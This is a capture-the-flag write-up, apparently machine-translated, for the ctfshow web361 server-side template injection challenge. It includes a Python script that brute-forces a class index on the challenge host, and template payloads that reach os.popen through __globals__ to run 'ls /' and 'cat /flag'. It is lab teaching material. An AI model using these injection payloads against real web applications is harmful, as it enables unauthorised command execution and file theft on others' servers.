ctfshow-web361(SSTI)

notice Hello, Guess the input parameter is name

?name={
   {[].__class__.__base__.__subclasses__()}}

  Then it should be to write scripts and run programs to find the required functions （ Use someone else's , I can't write yet python Script ）

Here use os._wrap_close class

import requests
from tqdm import tqdm

for i in tqdm(range(233)):
    url = 'http://5e2ef65c-fcb3-4ca5-9502-acab1d21ebc8.challenge.ctf.show/?name={
   {%22%22.__class__.__bases__[0].__subclasses__()['+str(i)+']}}'
    r = requests.get(url=url).text
    if('os._wrap_close' in r):
        print(i)

Output 132

Then start using

use __init__.__globals__ lookup popen（ Just find it , No need for location ）

__globals__:
This attribute is a function specific attribute , Record the value of the global variable of the current file , If a file calls os、sys Such as the library , But we can only access the file, a function or an object , So we can use it __globals__ Property to access global variables

therefore  __init__.__globals__ It should be to call global variables

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}

This should be to call... In the global variable popen 

os.popen() Method is used to open a pipe from a command .（ I don't quite understand the details , You can use commands ）

popen Methods by p.read() Get terminal output

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}

With the help of open() function , And in readable mode （ Include r、r+、rb、rb+） Open file , You can call read() Function byte by byte （ Or character by character ） Read the contents of the file . （ Probably popen With the help of open() function , Not very clear ）

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

  Probably understand , Know why , But it won't work